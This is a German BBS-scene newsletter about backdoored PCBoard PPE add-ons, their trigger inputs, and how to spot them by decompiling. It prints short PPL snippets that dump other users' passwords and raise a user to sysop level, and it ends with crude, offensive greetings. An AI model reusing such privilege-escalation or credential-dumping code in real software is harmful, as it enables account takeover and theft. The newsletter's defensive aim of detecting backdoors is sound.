PC BOARD NEWSLETTER

PC BOARD NEWSLETTER

EIN TEXT VON Bad Peon

-1. VORWORT

Moin!
Wir haben uns gedacht, wir bringen mal n paar Infos über Backdoors in PPEs und über die Zukunft von PC Board bzw. die des Herstellers Clark Development Company (CDC) selbst, damit ihr auch wisst, was Sache ist.

0. INHALTSVERZEICHNIS

-1.	VORWORT	Bla
0.	INHALTSVERZEICHNIS	Hä?!
1.	BACKDOORS IN PPES	Sechs konkrete Beispiele
2.	WIE MAN SICH VOR BACKDOORS SCHÜTZT	Erkennen und vernichten!
3.	EIN AUSBLICK IN DIE ZUKUNFT	PPLC 3.40 suckt!
4.	WAS IST MIT CDC LOS?	Haste ma ne Mark?
5.	DIES UND DAS UND IRGENDWAS	Greetings und Welteroberungspläne

1. BACKDOORS IN PPES

Aja... diese Beispiele sind nicht alle 100% aktuell, aber die meisten Sysops werfen PPEs nicht einfach weg, bloss weil sie alt sind... es ist also gut möglich, dass der einer oder andere seit Monaten in seinem Board PPEs mit Backdoors laufen hat... :) TITEL : Intense Flag vO.8 GROUP : CIA - Creators of Insane Art ARCHIVNAME : CIAFLG08.ZIP PPE-FILENAME: IFLAG.PPE HERKUNFT : N/A FILE_ID.DIZ : .c!a. ° ÜÜÜÜ Ü²ßßÛÜ ÜÜÜ² Ü²ÛÛÜ²ßÛ ° ß ß²ß ÜÜÛÛÛÛÜ²ßÜ ° ßÛÛÛÛ²ß ÜÜ²ÜÛÛÜÜ Ü ß ßÛÛÝ ÜÜ²ÛÛ Ü ßß ° ß²ÛßÞ²Ü² * ß ° ÞÛÛ XXßßßß² Ü²ß² ± ° ß °ÞÛÝ Ü ²Ü ²ÛÝ° ÜÛÛ²ÜÜ ßÛÛÜÝÜ ÜÛÛÛÛÛÜÛ² ÜÜÜ Þ² ÛÛ ÝßÛÜ ÛÛÛÝß² ÛÛß²Ü ²ÛÛß ßÛÛÝ Û²ß Û ß²ßÛÛÛÛÛÜßß ²Ûßß° ß²ÛÛÜÛß²Ü *Ü ß Ü*ß Ü ÜÜÜÛ ² Ü²ÛÜÜ ßßßßß Ü ² * Ü ÜÛ²ß ßßßÛ²Ü Ü*ß ß ß ß ßßß . . ßßß ²ß *Ü ß [===(07/15/95)=============================] Intense Flag vO.8 by Dark Jester [PPE] For PCB 15.21+ ONLY! A NEW FLAG PPE more like the PiPELiNE interface! Aktivierung durch: Eingabe von "iA!" Effekt : Gibt dem User Sysop-Security. TITEL : Press Enter.PPE GROUP : DC - Dark Community ARCHIVNAME : DC-ENTER.ZIP PPE-FILENAME: ENTER.PPE HERKUNFT : Ultra lame, also wahrscheinlich von den Autoren selbst. FILE_ID.DIZ : +++DARK COMMUNITY+++ | PRESS ENTER.PPE | | IMPORTANT FOR ALL | | SYSOPS!!! | | READ DC.NFO FILE | | TO GET A PRESENT | |-------------------| | [05/03/97] | Aktivierung durch: Eingabe von "!" Effekt : Gibt die Namen und Passwörter der ersten zehn Benutzer des Sytems (also u.a. auch des Sysops) ans Modem aus, nicht aber an den lokalen Screen! TITEL : Menu Command GROUP : A.R Team ARCHIVNAME : N/A PPE-FILENAME: MPROMPT.PPE HERKUNFT : Anscheinend gerippt, mit Backdoor versehen und rereleaset. FILE_ID.DIZ : ¬« A GREAT NEW PPE FROM A.R TEAM «¬ ¬¬ MENU COMMAND! FADING, PALETTE ¬¬ «¬ CHANGING, DELAY CFG.. 100% CFG! ¬« ¬« GREAT NEW PPE !!! TAKE'T NOW! «¬ Aktivierung durch: Eingabe von "FFF1" Effekt : Gibt dem User Sysop-Security. TITEL : Energy Meter Logoff Prompt GROUP : Ako/Cpc ?? ARCHIVNAME : WAVLOGOF.ZIP PPE-FILENAME: WAVLOGOF.PPE HERKUNFT : Ultra lame, also wahrscheinlich von den Autoren selbst. FILE_ID.DIZ : ÉÍ-ù* ENERGY METER LOGOFF PROMPT --ÍÍ» º PPE- To Replace the Cheesy PCB default º º "Proceed with logoff" prompt. This has º º LIGHT BAR and COOL ANIMATIONS (which isº º rare in PPEs) this is a MUST TRY!!!! º ÈÍÍÍ--ùùúúPeeHS KcaLB [01/04/96] =AKo= ù-¼ Aktivierung durch: Drücken von "*" nach dem Wählen von "USE RESERVES". Effekt : Gibt dem User Userlevel 110 (Standartvorgabe für Sysoplevel). Das funktioniert nur, wenn es im PWRD- File diesen Userlevel auch gibt. TITEL : Protocol Select Replacement GROUP :Gilden ARCHIVNAME : N/A PPE-FILENAME: N/A HERKUNFT : Fake: einfach Version v2.0 mit nem Backdoor drin. FILE_ID.DIZ : -*( PROTOCOL SELECT REPLACEMENT )*-» É-Í- ÜÛÛÛÛÛÛÛÛÛ ÛÛÛÛ -- ßÛÛÛÛßßÛÛÛÜ --- º °± ÛÛÛÛ ÜÜÜÜÜ ÛÛÛÛ ±±± ÛÛÛÛ ÛÛÛÛ ±° º °± ÛÛÛÛ ßÛÛÛÛ ÛÛÛÛ ÜÜÜÜ ÛÛÛ ÛÛÛÛ ±° º °± ÛÛÛÛÜÜÛÛÛÛ ÛÛÛÛ ÛÛÛÛ ÛÛÛ ÛÛÛÛ ±° º --- ßßßßßßÛÛÛÛ ßßßßßÛÛÛÛ ßßßßßßßß -Í-Í¼ *NiCE CURSOR iNTERFACE *FULLY CONFiGURABLE (v2.1) *MiNOR BUGFiX (PANDUR/GLD) º ÈÍÍ-ÍÍ--Í---Í-------Í----(13/o1/96)-- Aktivierung durch: N/A Effekt : Gibt dem User Sysop-Security. TITEL : Oneliner v.1 GROUP : Independent: Black Night ARCHIVNAME : BK-ONEL.ZIP oder BK!ONEL.ZIP PPE-FILENAME: ONELINER.PPE HERKUNFT : Ein Fake, der NICHT von Black Night stammt. Entdeckt von The Mighty SCI!, Cyz und Co. FILE_ID.DIZ : ÛßßßßßßßßßßßßßßßßßßßßßßßßßÛ Û ²ÛÛßÛÛÛ ²ÛÛßÛÛÛ ÛÛÛßÛÛÛ Û ² ²ÛÛ ÜÜÜ ²ÛÛ ÜÜÜ ÛÛÛßßß Û Û ßßßßßßß ßßß ßßß ßßßßßßß Û Û LiNeR V.1 Û ÞßßßßßßßßßßßßßßßßßßßßßßßßßÝ Þúúúúúúúúúúúúúúúúúúúúúúúú Ý ÞúúCODEDúBYúBLACKúKNIGHTúúÝ ²ÛÜßÜÜßÜÜßÜßÜßÜßÜÜßÜßÜßÜßÜ² Ein echtes "Meisterwerk", über das wir schon einmal berichtet haben (in UE-00074), aber mittlerweile haben wir genauere Infos darüber. Diese PPE enthält gleich mehrere Backdoors: 1. Aktivierung durch: Starten der PPE Effekt : Kopiert die Userbase und moved sie unter drei anderen Namen (THCHNO.ZIP, THBSHTBV.TXT, JANK.ZIP) ins Down- load-Verzeichnis der Main Board-Konferenz und trägt sie auch gleich in die Downloadliste ein. Zum downloaden muss man "flag [name]" tippen, weil die Files ja nicht in den Filelisten landen. 2. Aktivierung durch: Location des Users ist "bye bye". Effekt : Löscht folgende Files: c:\autoexec.bat c:\autoexec.bak c:\config.sys c:\config.sys Ein Bug :) c:\command.com c:\dos\command.com Die folgenden Files werden auch gleich aufgespürt und selbstverständlich ebenfalls gekillt: USERS CNAMES DLPATHS.LST (der Main Board-Konferenz) PCBOARD.DAT Achja... da hier das DELETE-Kommando von PC Board be- nutzt wird, sollte es nicht weiter schwer sein, diese Files mittels einer Bootdiskette und UNDELETE wieder- herzustellen. Übringens wird das DELETE-Kommando NICHT von PPLX 2.00 angekreidet! 3. Aktivierung durch: Location des Users ist "chicken man". Effekt : Gibt dem User Sysop-Security. 4. Aktivierung durch: In Zeile 32 von ONELINER.CFG steht "backdoor off". Effekt : Löscht die drei Kopien der Userbase wieder. So... wie wir gesehen haben, werden Backdoors für gewöhnlich durch Ein- gaben des Users aktiviert und dienen zum Erreichen der höchstmöglichen Userlevels bzw. zum Zugriff auf fremde (bessere) Accounts.

2. WIE MAN SICH VOR BACKDOORS SCHÜTZT

Man dekompiliert einfach die fragwürdige PPE mit PPLX 2.00 und achtet dabei auf die "Decompiling Flags", die PPLX vergibt, wenn bestimmte verdächtige Funktionen in einer PPE vorkommen. Dann sieht man sich das erzeugte PPX-File an und scrollt erst mal ganz an den Schluss, wo die Flags mit ihren Erklärungen stehen. Anschliesend sucht man (vom Anfang des Files an!) nach den Statements, die PPLX dort aufgeführt hat.

Sollte ein U_PWD bemängelt worden sein, sucht man danach; wenn davor ein 'GetUser' steht ist es (meistens) harmlos, da es nur das Password des derzeitigen Users enthält. Steht davor allerdings ein 'GetAltUser', so liest die PPE das Passwort/die Passwörter anderer User.

Ein Beispiel aus der WAVLOGOF.PPE:

For INTEGER004 = 1 To 10 GetAltUser INTEGER004 MPrintLn MPrint "@POFF@" MPrintLn U_Name() MPrintLn U_Pwd MPrintLn Next

For/Next sorgt dafür, dass alles, was dazwischen steht, mit jedem INTEGER004 von 1 bis 10 abgearbeitet wird. In diesem Fall werden also die Daten des Users Nummer 1-10 geladen, eine Leerzeile wird ans Modem geschickt (wir wollen ja schliesslich auch komfortable und ordentlich aussehende Backdoors!), dann wird das More?-Prompt deaktiviert (einmal hätte auch gereicht, müsste nicht in der Schleife stehen), dann wird der Name des Users ausgeben, dann sein Passwort und eine weitere Leerzeile später geht das ganze mit dem nächsten User weiter.

Ein User, der dieses Backdoor benutzt, sieht dann etwa folgendes:

BAD PEON ASDFLKHSDMYVCOI THE MIGHTY SCI 7328984a7w876 OMEN LINUXRULES M0! S*D.S}8ßèFS^-D%F!/&|%·ÕïS(SD=äõ,Sæ'Dý5²4øS$D#ƒ_*2`sJDòÄÉß;)ü?[Ü@A (usw., hab hier keinen Bock 40 Zeilen für ein Beispiel zu opfern) Ein PUTUSER bedeutet, dass die Userdaten des derzeitigen Users neu geschrieben werden, d.h. in der Regel verändert wurden. Hierbei sollte man nach einem U_SEC suchen, dass vor einem = steht, wie z.B. in dieser Zeilenfolge aus der WAVLOGOF.PPE:

GetUser U_Sec = 110 PutUser GetUser liest die Userdaten, U_Sec = 110 setzt den Userlevel auf 110 und PutUser speichert dann die Userdaten. Ob der User in diesem Fall tatsächlich Sysop-Privilegien geniest hängt davon ab, ob der Sysop die voreingestellten Werte für die Sysop-Funktionen hochgesetzt hat oder nicht, aber die meisten Sysops arbeiten einfach mit der Standart-Konfiguration von PC Board... selber schuld!

Wenn es in dem Board gar keinen Userlevel 110 gibt, dann gibt PC Board nur eine Fehlermeldung aus und schreibt die Userdaten gar nicht erst in die Userbase.

Bessere Backdoors sehen da eher so aus (IFLAG.PPE):

GetUser U_Sec = ReadLine(PCBDat(), 16) PutUser Hier wird der neue Userlevel des Users auf den Wert gesetzt, der in der PCBOARD.DAT in der Zeile 16 vermerkt ist, und das ist genau der Wert, der zur "Users File Maintainance" erforderlich, also bei jedem halbwegs vernünftigen Sysop der höchste Userlevel überhaupt (damit kann man Userdaten ausspähen und verändern). Daher wird diese PPE dem User in jedem Board den maximalen Userlevel geben, auch wenn der Sysop die Konfiguration komplett umgekrempelt hat. Gut nich? :)

3. EIN AUSBLICK IN DIE ZUKUNFT

Mit PC Board 15.4 kommt, wie an den Beta-Versionen zu sehen war, mal wieder eine neue Version von PPLC, nämlich 3.40.

Sie wird natürlich NICHT abwärtskompatibel sein, d.h.: Ältere PC Boards können mit PPEs, die mit PPLC 3.40 kompeliert wurden, nichts anfangen, aber das war ja noch nie so.

Zusätzlich enthält PPLC 3.40 neue Routinen zur Verschlüsselung, die laut CDC das Dekompilieren für immer unmöglich machen werden.

PPEs, die mit PPLC 3.40 kompeliert wurden, können mit KEINEM heute existenten Programm dekompiliert werden! Eine neue Flut von Backdoors rollt also auf uns zu, und wir haben keine Möglichkeit, etwas dagegen zu unternehmen.

Lone Runner^AGS (PPLX) und Chicken^T4F (PPLD) haben damit mal wieder ein hartes Stück Arbeit vor sich... Aber keine Sorge Jungs, ewiger Weltruhm ist euch sicher! ;)

Aber wenn man das ganze (ausnahmsweise) mal von einem objektiven Standpunkt betrachtet, so stellt man fest:

PPEs, die mit PPLC 3.40 kompiliert wurden...
-sind maximal 0.1% kleiner im Vergleich zu PPLC 3.30,
-benötigen länger, um von PC Board entschlüsselt zu werden,
-erzielen wegen der Verschlüsselung noch schlechtere Pack-Raten,
-laufen nur auf PC Board 15.4,
-sind IMMER verdächtig, Backdoors zu enthalten,
-und sind daher ein absolut tödliches Risiko für jeden Sysop!

Daher würde ich es als PPE-Coder nicht für sehr sinnvoll halten, meine PPEs mit PPLC 3.40 zu kompelieren, weil sonst jeder Angst vor einem möglichen Backdoor hat und nichts unternehmen kann, um dieses Risiko zu minimieren.
Deshalb werden bis auf weiters (also etwa bis PPLX/PPLD mit PPLC 3.40 umgehen können) alle PPEs von Underground Empire nicht mit PPLC 3.40 kompeliert!

Wenn ihr eine Underground Empire-PPE findet, die mit PPLC 3.40 kompeliert wurde, die neuer als die übrigen Files im Archiv ist, deren Datum nicht mit dem im -UE-REL-.NFO übereinstimmt oder die sonstwie einen merkwürdigen Eindruck macht, dann installiert es nicht sondern schickt es uns! Bis jetzt sind zwar noch keine gehackten Versionen von UE-PPEs aufgetaucht, aber einmal ist immer das erste mal. ;(

Noch ein Wort zum Dekompilieren im allgemeinen: Ich benutze keine Decompiler-Traps, weil ich finde, dass jeder die Möglichkeit haben sollte, sich den Code einer PPE anzusehen, um herauszufinden, was sie eigentlich so treibt.
Ausserdem kann das Rekompilieren die einzige Möglichkeit sein, die PPE an sein Board anzupassen, falls die Configfiles nicht umfassend genug ausfallen sollten.

Natürlich weiss ich, dass es genug Leute gibt, die sich den Code "einfach so" anschauen bzw. gerade selber eine ähnliche PPE schreiben ;)

Aber was spricht dagegen, sich anzusehen, wie andere Leute ein bestimmtes Problem gelöst haben?? Das ganze hört für mich genau dann auf, wenn ganze Passagen einer dekompilierten PPE in eine neue, "eigene" PPE kopiert und nur noch die Namen der Variablen angepasst werden. Das ist dann nicht mehr Inspiration, sondern dumpfes Abschreiben!

WARUM HAT CDC WAS GEGEN DECOMPILER?
Guckt euch mal die Preisliste von CDC an :) Auch wenn sie ihre Preise erheblich gesenkt haben, so bleibt PC Board ein Profi-Programm, an dem auch andere Firmen etwas verdienen wollen, indem sie z.B. Shareware-PPEs mit eingeschränktem Funktionsumfang rausbringen, die dann sofort gecrackt werden.

4. WAS IST MIT CDC LOS?

Wie wir inzwischen erfahren haben, ist die Firma CDC mittlerweile PLEITE und es sieht so aus, als würden sämtliche Angestellte arbeitslos und der gesamte Firmenbesitz verschachert werden.

Allerdings versucht der harte Kern von CDC, Wege zu finden, um das Geschäft nicht komplett aufgeben zu müssen, da sie mit PC Board Metaworlds ja ein zukunftsträchtiges Programm haben, dass nur deswegen kein Geld bringt, weil es noch nicht 100%ig ausgereift ist und weil CDC schlicht kein Geld hat, um Werbung dafür zu machen.

PC Board selbst lässt sich im Zeitalter der Völkerwanderung ins Internet ja kaum noch verkaufen, CDC hat das zu spät erkannt und daher haben sie jetzt Probleme, zu überleben.

Wir werden trotzdem weiterhin PPEs entwickeln und die meisten Sysops werden auch nicht sofort ihre Boards wegschmeissen, nur weil es in der nächsten Zeit keine Updates mehr für PC Board geben wird... viele Sysops benutzen ja z.B. immer noch PC Board 15.22, obwohl schon 2 neuere Versionen da sind, nämlich 15.3 und 15.4beta.

5. DIES UND DAS UND IRGENDWAS

Ich grüsse:

ACE ARUU, HANDO und THE EXORCIST, die einige Bugs im derzeit laufenden Beta-Test für einige PPEs (u.a. UE!WHO v2.0) gefunden haben, THE MIGHTY SCI, der so nett ist, für die Defizite eines ganz bestimmten Ex-UE-Members einzuspringen, ALLY605, der etwas glücklos ein PC Board mit allem, was man so braucht, laufen hat ohne dass es jemand bemerken würde, JOSEF, dessen "Gilde Szene Beobachter" sich eigentlich nur um uns dreht, CYZ, der es immer noch nicht geschafft hat, mich wieder in sein Board zu lassen, TIGER, der vor Objektivität nur so strotzende UE-Kritiker von VDO, HEADBANGER, von dem ich endlich alle persönlichen Daten habe, FEAR FACTORY, die wohl bald die Charts erstürmen werden, VENOM, ohne die es keinen Trash, Death, Black oder sonstwas-Metal geben würde, SLAYER, die hoffentlich wieder zu ihrer alten Klasse zurückfinden, DOC FRED, dessen Mörder freien Download in allen UE-Boards bekommt, MANIAC, dessen Board total vergammelt, ALLE USER DER WESTERN ALLIANCE, die jeden Upload für eine persönliche Opferung halten, ALLE LAMER DER 09 AREA, die anscheinend aus allen anderen Areas rausgeschmissen wurden, MARIA UND JOSEF, deren Sohn ziemlich kaputt ist und sich für JESUS hält, SUICIDAL SNOWMAN UND WHITE TRASH, die sich pausenlos gegenseitig vergewaltigen und nebenbei noch die gesamte US-ANSI-Szene durch den Dreck ziehen, HGH, die uns immerhin auch mal gegreetet haben und eigentlich ganz ok waren, LORD XEEN, dessen PPEs bis heute unkopiert sind und dessen griechischer Dealer immer noch tot ist, DIR, dass du diesen Schmontz liest und ALLE SYSOPS, dass sie sich auch mal Sorgen um ihre Boardsoftware machen. :)

Noch was:
Wie allgemein zu Vernehmen ist, sind eine ganze Menge Sysops derzeit damit beschäftigt, sehnsüchtig auf einen Nachfolger für die Standart- PPE FLAG.PPE von PWA zu warten... nur noch wenige Monate! Aja genau: Greets an Xtreeman & Synopsis! ;)

CYA... I AM BAD PEON!